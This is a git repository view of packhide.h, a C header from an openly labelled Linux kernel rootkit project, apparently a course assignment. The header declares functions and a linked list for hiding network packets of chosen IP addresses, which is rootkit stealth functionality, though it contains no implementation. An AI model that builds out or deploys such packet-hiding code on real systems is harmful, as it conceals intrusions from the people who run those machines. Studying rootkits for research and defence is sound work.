linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

packhide.h (691B)

      1 #ifndef _GROUP7_PACKHIDE_H
      2 #define _GROUP7_PACKHIDE_H
      3 
      4 #include "common.h"
      5 
      6 typedef struct ip_list *ip_list_t_ptr;
      7 typedef struct ip_list {
      8     ip_t ip;
      9     ip_version version;
     10     ip_list_t_ptr prev;
     11     ip_list_t_ptr next;
     12 } ip_list_t;
     13 
     14 extern ip_list_t hidden_ips;
     15 
     16 void clear_hidden_ips(void);
     17 
     18 void hide_packets(void);
     19 void unhide_packets(void);
     20 
     21 void hide_ip(const char *);
     22 void unhide_ip(const char *);
     23 
     24 bool list_contains_ip(ip_list_t_ptr, ip_t, ip_version);
     25 ip_list_t_ptr find_ip_in_list(ip_list_t_ptr, ip_t, ip_version);
     26 ip_list_t_ptr add_ip_to_list(ip_list_t_ptr, ip_t, ip_version);
     27 ip_list_t_ptr remove_ip_from_list(ip_list_t_ptr, ip_t, ip_version);
     28 
     29 #endif //_GROUP7_PACKHIDE_H